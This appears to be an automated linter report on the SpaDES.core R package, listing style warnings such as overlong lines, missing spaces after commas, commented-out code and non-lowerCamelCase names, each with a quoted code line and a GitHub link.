^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/abdee694ceed2b56edde8af0ae0b333bffca0170/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              